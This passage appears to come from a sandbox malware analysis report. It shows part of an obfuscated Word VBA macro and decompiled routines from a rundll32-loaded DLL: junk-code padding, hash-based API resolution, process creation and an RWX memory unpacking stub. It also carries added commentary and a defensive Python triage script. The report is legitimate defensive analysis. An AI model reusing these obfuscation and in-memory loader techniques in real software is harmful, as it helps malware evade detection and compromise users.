254 | fUGOALvdN = FKISJTLG + 2 |

                                                                    255

                                                                    Endif

                                                                    256

                                                                    FKISJTLG = FKISJTLG + 2

                                                                    257

                                                                    Loop

                                                                    258

                                                                    Next

                                                                    Paragraphs

                                                                    258

                                                                    pzxJi:

                                                                    260

                                                                    Lynlzg8g_wcyt8ojr = Ev1oy1be511zamut8

                                                                    261

                                                                    Goto QtjyA

                                                                    262

                                                                    Set phkpFqFCH = DHwdFs

                                                                    DHwdFs

                                                                    263

                                                                    Dim nHiSH, jHDSG, udnviH as Long

                                                                    264

                                                                    Dim DLwSlnDF as Word.Paragraph

                                                                    265

                                                                    Dim pXPTCf() as Byte

                                                                    266

                                                                    For Each DLwSlnDF in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    267

                                                                    pXPTCf = DLwSlnDF.Range

                                                                    Range

                                                                    268

                                                                    dscc = "sadsaccc" & DLwSlnDF.Range

                                                                    Range

                                                                    269

                                                                    jHDSG = UBound(pXPTCf) - 1

                                                                    UBound

                                                                    270

                                                                    nHiSH = 0

                                                                    271

                                                                    Set seTGCvRG = mwvhyA

                                                                    mwvhyA

                                                                    272

                                                                    Do Until jHDSG > jHDSG

                                                                    273

                                                                    If pXPTCf(jHDSG) = 46 Or jHDSG = jHDSG Then

                                                                    274

                                                                    dscc = "sasdsacc" & (nHiSH / 2) + 1 & " to " & (jHDSG / 2) + 1 & MidB$(pXPTCf, nHiSH + 1, jHDSG - nHiSH + 3)

                                                                    MidB$

                                                                    275

                                                                    nHiSH = jHDSG + 2

                                                                    276

                                                                    Endif

                                                                    277

                                                                    jHDSG = jHDSG + 2

                                                                    278

                                                                    Loop

                                                                    279

                                                                    Next

                                                                    Paragraphs

                                                                    279

                                                                    QtjyA:

                                                                    281

                                                                    E4u6ubi3v5l2 = Yw0lmj9uz2sfz0(Lynlzg8g_wcyt8ojr)

                                                                    282

                                                                    Goto XxLEEC

                                                                    283

                                                                    Set ZtgGUHFGJ = prgAO

                                                                    prgAO

                                                                    284

                                                                    Dim TMQhTRa, LZepVwu, JPHDBd as Long

                                                                    285

                                                                    Dim bkUZDN as Word.Paragraph

                                                                    286

                                                                    Dim QNtsSHe() as Byte

                                                                    287

                                                                    For Each bkUZDN in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    288

                                                                    QNtsSHe = bkUZDN.Range

                                                                    Range

                                                                    289

                                                                    dscc = "sadsaccc" & bkUZDN.Range

                                                                    Range

                                                                    290

                                                                    LZepVwu = UBound(QNtsSHe) - 1

                                                                    UBound

                                                                    291

                                                                    TMQhTRa = 0

                                                                    292

                                                                    Set MxAtNhGI = imnrzOF

                                                                    imnrzOF

                                                                    293

                                                                    Do Until LZepVwu > LZepVwu

                                                                    294

                                                                    If QNtsSHe(LZepVwu) = 46 Or LZepVwu = LZepVwu Then

                                                                    295

                                                                    dscc = "sasdsacc" & (TMQhTRa / 2) + 1 & " to " & (LZepVwu / 2) + 1 & MidB$(QNtsSHe, TMQhTRa + 1, LZepVwu - TMQhTRa + 3)

                                                                    MidB$

                                                                    296

                                                                    TMQhTRa = LZepVwu + 2

                                                                    297

                                                                    Endif

                                                                    298

                                                                    LZepVwu = LZepVwu + 2

                                                                    299

                                                                    Loop

                                                                    300

                                                                    Next

                                                                    Paragraphs

                                                                    300

                                                                    XxLEEC:

                                                                    302

                                                                    K532dwnyk0pybrc = E4u6ubi3v5l2

                                                                    303

                                                                    Goto SWSoCG

                                                                    304

                                                                    Set OaVnI = UmQHurWB

                                                                    UmQHurWB

                                                                    305

                                                                    Dim zxEzinCG, EHISACDA, aBRvB as Long

                                                                    306

                                                                    Dim XdfYSIXX as Word.Paragraph

                                                                    307

                                                                    Dim wWvlxHJH() as Byte

                                                                    308

                                                                    For Each XdfYSIXX in Tvh1u8793dltn9.Paragraphs

                                                                    Paragraphs

                                                                    309

                                                                    wWvlxHJH = XdfYSIXX.Range

                                                                    Range

                                                                    310

                                                                    dscc = "sadsaccc" & XdfYSIXX.Range

                                                                    Range

                                                                    311

                                                                    EHISACDA = UBound(wWvlxHJH) - 1

                                                                    UBound

                                                                    312

                                                                    zxEzinCG = 0

                                                                    313

                                                                    Set wVEbaDF = WhmkB

                                                                    WhmkB

                                                                    314

                                                                    Do Until EHISACDA > EHISACDA

                                                                    315

                                                                    If wWvlxHJH(EHISACDA) = 46 Or EHISACDA = EHISACDA Then

                                                                    316

                                                                    dscc = "sasdsacc" & (zxEzinCG / 2) + 1 & " to " & (EHISACDA / 2) + 1 & MidB$(wWvlxHJH, zxEzinCG + 1, EHISACDA - zxEzinCG + 3)

                                                                    MidB$

                                                                    317

                                                                    zxEzinCG = EHISACDA + 2

                                                                    318

                                                                    Endif

                                                                    319

                                                                    EHISACDA = EHISACDA + 2

                                                                    320

                                                                    Loop

                                                                    321

                                                                    Next

                                                                    Paragraphs

                                                                    321

                                                                    SWSoCG:

                                                                    323

                                                                    End Function


                                                                      Executed Functions

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2100031965.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24c2a9e5fd434beaddd41c380e015cc614590ab19d9336887c3f8f490c4b510a
                                                                      • Instruction ID: fb601fcd71fb2f06c0bb6ea399e9df49e12c94054cba189d21a259d79329ac40
                                                                      • Opcode Fuzzy Hash: 24c2a9e5fd434beaddd41c380e015cc614590ab19d9336887c3f8f490c4b510a
                                                                      • Instruction Fuzzy Hash: 2CB1DD5594EBC24FE7438B789C666A13FB0AF13211B4E41EBC4C8CB0E3E95D595AC362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2100031965.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d81105222315aa074a501b47e0b6ef8d8a9258a420a2f3cc5d243f0d6248824
                                                                      • Instruction ID: a23a781ef851a19f757089bd4314f35bfd214aa7c2d18b905ba66e2c61ccd362
                                                                      • Opcode Fuzzy Hash: 7d81105222315aa074a501b47e0b6ef8d8a9258a420a2f3cc5d243f0d6248824
                                                                      • Instruction Fuzzy Hash: 4021DD6090F7C24FE7439B384C656247FB0AF17225B4A44EBC089CB1B3DA685C59C722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2100031965.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12a81600e92471e8588c64ba58c1ea87c0fd27ac29b6ba5d0093e4f4fbf75e5f
                                                                      • Instruction ID: 709c934350238072381bf42fe58d68ba29569f0e0fd7e9884c9beb08909461bc
                                                                      • Opcode Fuzzy Hash: 12a81600e92471e8588c64ba58c1ea87c0fd27ac29b6ba5d0093e4f4fbf75e5f
                                                                      • Instruction Fuzzy Hash: F9D05E2045DACA4FE742A3386915195BFA0FF86245F4506A7ECCDDA0B3E6180BA8C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Execution Graph

                                                                      Execution Coverage:5%
                                                                      Dynamic/Decrypted Code Coverage:25.3%
                                                                      Signature Coverage:1.1%
                                                                      Total number of Nodes:91
                                                                      Total number of Limit Nodes:4

                                                                      Graph

[Execution graph image not recoverable. API nodes present in the graph: VirtualAlloc (14f5c4, 14fb30), UnmapViewOfFile and VirtualAlloc (14fc15), VirtualProtect (14fd52), GetPEB (several nodes in the 10000000 module), lstrcmpiW (10001c5f), ExitProcess (10013e4a), CreateProcessW (10019d51), SHGetFolderPathW (1001bb33).]

                                                                      Executed Functions

                                                                      Control-flow Graph

[Control-flow graph image not recoverable; legend: Executed / Not Executed. Node 46: 10013da3-10013e54, call 10004010, ExitProcess.]
                                                                      C-Code - Quality: 89%
E10013DA3() {
	signed int _v8;
	signed int _v12;
	signed int _v16;
	signed int _v20;
	signed int _t49;

	_v12 = 0xd5;
	_v12 = _v12 + 0xee5c;
	_v12 = _v12 | 0x8aaf0837;
	_v12 = _v12 << 4;
	_v12 = _v12 ^ 0xaafeb881;
	_v20 = 0xab6b;
	_v20 = _v20 + 0xffffd0c9;
	_v20 = _v20 + 0x2ddc;
	_v20 = _v20 ^ 0x00008f38;
	_v16 = 0x3314;
	_v16 = _v16 + 0x9923;
	_v16 = _v16 << 0xa;
	_v16 = _v16 ^ 0x0330d641;
	_v8 = 0x7967;
	_t49 = 0x1f;
	_push(_t49);
	_v8 = _v8 / _t49;
	_push(_t49);
	_v8 = _v8 * 0x3a;
	_v8 = _v8 ^ 0xe543aa3f;
	_v8 = _v8 ^ 0xe5437a66;
	E10004010(_t49, 0xac2d26d8, 0x135, _t49, 0xed6bd295);
	ExitProcess(0);
}

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 10013E4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: \$fzC$fzC
                                                                      • API String ID: 621844428-4050105108
                                                                      • Opcode ID: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
                                                                      • Instruction ID: 9f2c94031404c76f8a4347eca4ab1513b66c159a7c61353c874c37c29794b4be
                                                                      • Opcode Fuzzy Hash: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
                                                                      • Instruction Fuzzy Hash: A911F5B1D00308EFEB48DFA5C94A59EBBB0FB04708F208198E415B7291E7B86B45DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0014FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0014FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0014FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2107619882.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 96 10001b9d-10001c6d call 10017b8c call 10004010 lstrcmpiW
                                                                      C-Code - Quality: 90%
                                                                       			E10001B9D(void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8) {
                                                                       				signed int _v8;
                                                                       				signed int _v12;
                                                                       				signed int _v16;
                                                                       				signed int _v20;
                                                                       				signed int _v24;
                                                                       				intOrPtr _v28;
                                                                       				intOrPtr _v32;
                                                                       				void* _t49;
                                                                       				int _t63;
                                                                       				signed int _t65;
                                                                       				signed int _t66;
                                                                       
                                                                       				_push(_a8);
                                                                       				_push(_a4);
                                                                       				E10017B8C(_t49);
                                                                       				// Dead-store arithmetic: _v8, _v12, _v16, _v20, _v24, _v28, _v32 and the divisor _t65 are
                                                                       				// written below and never read again in this function. This is junk code that defeats byte
                                                                       				// signatures and pads the decompilation; only _t66 survives, as an argument to E10004010.
                                                                       				_v24 = _v24 & 0x00000000;
                                                                       				_v32 = 0x6d740e;
                                                                       				_v28 = 0x43ca31;
                                                                       				_v8 = 0xde52;
                                                                       				_v8 = _v8 + 0xffff302d;
                                                                       				_t65 = 0x73;
                                                                       				_v8 = _v8 / _t65;
                                                                       				_t66 = 0x33;
                                                                       				_v8 = _v8 * 0x3f;
                                                                       				_v8 = _v8 ^ 0x00005145;
                                                                       				_v16 = 0xb51c;
                                                                       				_v16 = _v16 * 0x19;
                                                                       				_v16 = _v16 ^ 0x573bb19d;
                                                                       				_v16 = _v16 ^ 0x572a283c;
                                                                       				_v12 = 0xa3c7;
                                                                       				_v12 = _v12 / _t66;
                                                                       				_v12 = _v12 * 0x3f;
                                                                       				_v12 = _v12 ^ 0x0000bd7b;
                                                                       				_v20 = 0x5d2c;
                                                                       				_v20 = _v20 ^ 0x811e33c3;
                                                                       				_v20 = _v20 ^ 0x811e27aa;
                                                                       				// Runtime import resolution. The second argument 0xac2d26d8 is passed by both kernel32 wrappers
                                                                       				// in this dump (here and in E10019C80 below), while the shell32 wrapper E1001BA7B passes
                                                                       				// 0xeed7a5cf; the last argument differs per API (0xd964d70b here). That is consistent with a
                                                                       				// (module hash, function hash) lookup. In E1001BA7B the returned pointer is called directly;
                                                                       				// here the decompiler has already resolved the callee to lstrcmpiW.
                                                                       				E10004010(_t66, 0xac2d26d8, 0x79, _t66, 0xd964d70b);
                                                                       				_t63 = lstrcmpiW(_a4, _a8); // executed
                                                                       				return _t63;
                                                                       			}
                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(0000BD7B,572A283C), ref: 10001C68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: <(*W
                                                                      • API String ID: 1586166983-931366690
                                                                      • Opcode ID: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
                                                                      • Instruction ID: 5c987274e65c3c22dfdbb34c56d7d9efcbdc8bc590f707738c434fd9af89b748
                                                                      • Opcode Fuzzy Hash: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
                                                                      • Instruction Fuzzy Hash: 062120B5D00208EFDB04CFE4C98A99EBBB1EB44304F10C08AE414AB2A0D7B99B419F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 101 14f550-14f59b call 14f960 104 14f59d-14f5a7 call 14f960 101->104 105 14f5aa-14f5da call 14f330 VirtualAlloc 101->105 104->105
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2107619882.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
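
                                                                       The two VirtualAlloc calls in the 0x130000 stubs above pass flAllocationType 0x3000 and flProtect 0x40, that is MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE, and the stub at 0014FB75 follows them with UnmapViewOfFile, a second RWX allocation and VirtualProtect: the in-memory unpacking sequence behind the "Allocates memory" and "code injection" signatures at the top of this report. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample. It parses the "APIs" lines in the exact format printed on this page (the four lines of the first stub are embedded as its input) and decodes the Win32 constants, which are standard values; the regular expression for the line format and the RWX triage rule are this example's own assumptions.

```python
"""Decode the memory-management API arguments recorded in a sandbox API trace.

Each 'APIs' line on this page has the form
    VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
with hex argument values and '?' where the tracer could not recover a value.
Example code, not part of the report; the line format regex is an assumption.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE = re.compile(r'^\W*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$')

# Standard Win32 constants: VirtualAlloc flAllocationType bits and flProtect values.
MEM_FLAGS = {0x1000: 'MEM_COMMIT', 0x2000: 'MEM_RESERVE', 0x80000: 'MEM_RESET',
             0x100000: 'MEM_TOP_DOWN', 0x200000: 'MEM_WRITE_WATCH',
             0x400000: 'MEM_PHYSICAL', 0x20000000: 'MEM_LARGE_PAGES'}
PAGE_BASE = {0x01: 'PAGE_NOACCESS', 0x02: 'PAGE_READONLY', 0x04: 'PAGE_READWRITE',
             0x08: 'PAGE_WRITECOPY', 0x10: 'PAGE_EXECUTE', 0x20: 'PAGE_EXECUTE_READ',
             0x40: 'PAGE_EXECUTE_READWRITE', 0x80: 'PAGE_EXECUTE_WRITECOPY'}
PAGE_MODIFIERS = {0x100: 'PAGE_GUARD', 0x200: 'PAGE_NOCACHE', 0x400: 'PAGE_WRITECOMBINE'}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE = 0x04 | 0x08 | 0x40 | 0x80


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the trace shows '?'
    ref: int                    # address of the call site


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every 'Api.MODULE(args), ref: addr' line; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue
        api, module, argstr, ref = m.groups()
        args = [None if a.strip() == '?' else int(a, 16)
                for a in argstr.split(',')] if argstr.strip() else []
        calls.append(ApiCall(api, module, args, int(ref, 16)))
    return calls


def decode_alloc_type(value: int) -> str:
    names = [n for bit, n in MEM_FLAGS.items() if value & bit]
    leftover = value & ~sum(MEM_FLAGS)          # bits we do not know a name for
    if leftover:
        names.append(hex(leftover))
    return '|'.join(names) or '0'


def decode_protect(value: int) -> str:
    names = [PAGE_BASE.get(value & 0xFF, hex(value & 0xFF))]   # low byte: exactly one base value
    names += [n for bit, n in PAGE_MODIFIERS.items() if value & bit]
    return '|'.join(names)


def triage(calls: List[ApiCall]) -> List[str]:
    """Flag RWX allocations, and a VirtualProtect that follows one in the same function."""
    findings, rwx_seen = [], False
    for c in calls:
        if c.api == 'VirtualAlloc' and len(c.args) == 4 and c.args[3] is not None:
            prot = c.args[3]
            alloc = decode_alloc_type(c.args[2]) if c.args[2] is not None else '?'
            if prot & EXECUTABLE and prot & WRITABLE:
                rwx_seen = True
                findings.append(f'RWX allocation: VirtualAlloc at {c.ref:08X} '
                                f'({alloc}, {decode_protect(prot)})')
        elif c.api == 'VirtualProtect' and rwx_seen:
            findings.append(f'VirtualProtect at {c.ref:08X} after an RWX allocation: '
                            f'in-memory unpacking/loader pattern')
    return findings


# The 'APIs' lines of the stub at 0014FB75 as printed on this page (copied, not invented).
LOADER_STUB_APIS = """\
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
• UnmapViewOfFile.KERNELBASE(?), ref: 0014FC25
• VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0014FC3F
• VirtualProtect.KERNELBASE(?,?,00000000), ref: 0014FD70
"""

if __name__ == '__main__':
    for finding in triage(parse_api_lines(LOADER_STUB_APIS)):
        print(finding)
```

                                                                       Run against the four lines of the first stub it reports both allocations as MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE and the trailing VirtualProtect as the re-protection step; the same parser accepts the CreateProcessW and SHGetFolderPathW lines further down, it simply has no rule for them.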

                                                                      Control-flow Graph

                                                                      control_flow_graph 111 10019c80-10019d6c call 10017b8c call 10004010 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                       			E10019C80(struct _PROCESS_INFORMATION* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a24, struct _STARTUPINFOW* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, int _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
                                                                       				signed int _v8;
                                                                       				signed int _v12;
                                                                       				signed int _v16;
                                                                       				signed int _v20;
                                                                       				void* _t53;
                                                                       				int _t64;
                                                                       				signed int _t67;
                                                                       				signed int _t68;
                                                                       				WCHAR* _t75;
                                                                       				struct _PROCESS_INFORMATION* _t76;
                                                                       
                                                                       				_t75 = __edx;
                                                                       				_push(0);
                                                                       				_push(_a68);
                                                                       				_t76 = __ecx;
                                                                       				_push(_a64);
                                                                       				_push(_a60);
                                                                       				_push(_a56);
                                                                       				_push(0);
                                                                       				_push(_a48);
                                                                       				_push(_a44);
                                                                       				_push(_a40);
                                                                       				_push(_a36);
                                                                       				_push(_a32);
                                                                       				_push(0);
                                                                       				_push(_a24);
                                                                       				_push(0);
                                                                       				_push(0);
                                                                       				_push(_a12);
                                                                       				_push(_a8);
                                                                       				_push(_a4);
                                                                       				_push(__edx);
                                                                       				_push(__ecx);
                                                                       				E10017B8C(_t53);
                                                                       				// Dead-store arithmetic: _v8, _v12, _v16, _v20 and the divisor _t67 are written below and
                                                                       				// never read again in this function (junk code); only _t68 survives, as an argument to E10004010.
                                                                       				_v12 = 0x6630;
                                                                       				_t67 = 0x77;
                                                                       				_v12 = _v12 / _t67;
                                                                       				_v12 = _v12 ^ 0x714ffcce;
                                                                       				_v12 = _v12 ^ 0x714f8e45;
                                                                       				_v8 = 0x1428;
                                                                       				_v8 = _v8 >> 0xf;
                                                                       				_t68 = 0x7f;
                                                                       				_v8 = _v8 / _t68;
                                                                       				_v8 = _v8 ^ 0x00007a2e;
                                                                       				_v20 = 0x48d2;
                                                                       				_v20 = _v20 + 0xab8a;
                                                                       				_v20 = _v20 ^ 0x0000b473;
                                                                       				_v16 = 0x6e9f;
                                                                       				_v16 = _v16 + 0xffff30eb;
                                                                       				_v16 = _v16 ^ 0xffffa3a6;
                                                                       				// Same runtime import resolver as in E10001B9D: the second argument is again 0xac2d26d8 (both
                                                                       				// kernel32 wrappers pass it), the last argument is specific to this API (0xd9f4cde0 here,
                                                                       				// 0xd964d70b for lstrcmpiW). The decompiler shows the resolved callee directly on the next line.
                                                                       				E10004010(_t68, 0xac2d26d8, 0x2b0, _t68, 0xd9f4cde0);
                                                                       				// CreateProcessW(lpApplicationName=_t75, lpCommandLine=_a8, lpProcessAttributes=0,
                                                                       				//   lpThreadAttributes=0, bInheritHandles=_a56, dwCreationFlags=0, lpEnvironment=0,
                                                                       				//   lpCurrentDirectory=0, lpStartupInfo=_a32, lpProcessInformation=_t76).
                                                                       				// The wrapper forwards the caller's command line and STARTUPINFO; creation flags are fixed at 0.
                                                                       				_t64 = CreateProcessW(_t75, _a8, 0, 0, _a56, 0, 0, 0, _a32, _t76); // executed
                                                                       				return _t64;
                                                                       			}
                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(00000000,FFFFA3A6,00000000,00000000,?,00000000,00000000,00000000,?,F5ADA244), ref: 10019D64
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
                                                                      • Instruction ID: 6f6f4ffef16e4567f02434b93fb23f43c8a1571d2b23c853eb8330a43a9d40a6
                                                                      • Opcode Fuzzy Hash: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
                                                                      • Instruction Fuzzy Hash: 6B31F9B690020CBFEF05DE95CD85CEEBB7AFB48354F108089FA1466260D7769E61AB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 116 1001ba7b-1001bb44 call 10017b8c call 10004010 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                       			E1001BA7B(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                       				signed int _v8;
                                                                       				signed int _v12;
                                                                       				unsigned int _v16;
                                                                       				signed int _v20;
                                                                       				intOrPtr _v24;
                                                                       				intOrPtr _v28;
                                                                       				void* _t43;
                                                                       				intOrPtr* _t52;
                                                                       				void* _t53;
                                                                       				signed int _t54;
                                                                       				void* _t60;
                                                                       
                                                                       				_t60 = __edx;
                                                                       				E10017B8C(_t43);
                                                                       				// Dead-store arithmetic: _v8, _v12, _v16, _v20, _v24 and _v28 are written below and never read
                                                                       				// again in this function (junk code); only the divisor _t54 survives, as an argument to E10004010.
                                                                       				_v28 = 0x37183;
                                                                       				_v24 = 0;
                                                                       				_v20 = 0xc1e;
                                                                       				_v20 = _v20 ^ 0x1ddfc436;
                                                                       				_v20 = _v20 ^ 0x1ddf9af4;
                                                                       				_v16 = 0xef7f;
                                                                       				_t54 = 0x45;
                                                                       				_v16 = _v16 * 0x79;
                                                                       				_v16 = _v16 >> 2;
                                                                       				_v16 = _v16 ^ 0x001c4db5;
                                                                       				_v12 = 0x4c2e;
                                                                       				_v12 = _v12 << 0xd;
                                                                       				_v12 = _v12 / _t54;
                                                                       				_v12 = _v12 ^ 0x00237cb0;
                                                                       				_v8 = 0xd2af;
                                                                       				_v8 = _v8 << 5;
                                                                       				_v8 = _v8 + 0xffffc92f;
                                                                       				_v8 = _v8 ^ 0x001a0fe8;
                                                                       				// Here the resolver's result is visible as what it is: a function pointer that is dereferenced
                                                                       				// and called on the next line. The second argument is 0xeed7a5cf rather than the 0xac2d26d8
                                                                       				// used by the kernel32 wrappers above, and the API trace attributes the call to
                                                                       				// SHGetFolderPathW in SHELL32.
                                                                       				_t52 = E10004010(_t54, 0xeed7a5cf, 0x2d2, _t54, 0x708e2747);
                                                                       				// The decompiler could not recover the callee's prototype through the indirect call (hence the
                                                                       				// 14-argument call and the 58% quality score); SHGetFolderPathW takes five arguments
                                                                       				// (hwndOwner, nFolder, hToken, dwFlags, pszPath), so the trailing arguments shown are an
                                                                       				// artifact of the unrecognised call, not values the API consumes.
                                                                       				_t53 =  *_t52(0, _t60, 0, 0, _a20, 0, __edx, 0, _a8, _a12, 0, _a20, _a24, _a28); // executed
                                                                       				return _t53;
                                                                       			}
                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00037183,?,?,?,?,?,?,?,?,00000003,1B835AC8,1B835AC8), ref: 1001BB3D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000007.00000002.2108186842.0000000010021000.00000040.00000001.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
                                                                      • Instruction ID: e57e8dc99711bf8f73612d28d45590ecd43cf8e3c82c42321f98dcc01df6ce76
                                                                      • Opcode Fuzzy Hash: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
                                                                      • Instruction Fuzzy Hash: 322134B5D00209BBDB10DFAAC84A8EFBFB8EB95314F108089F924A6250C3B44A55DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 100%
                                                                      			E1000A823() {
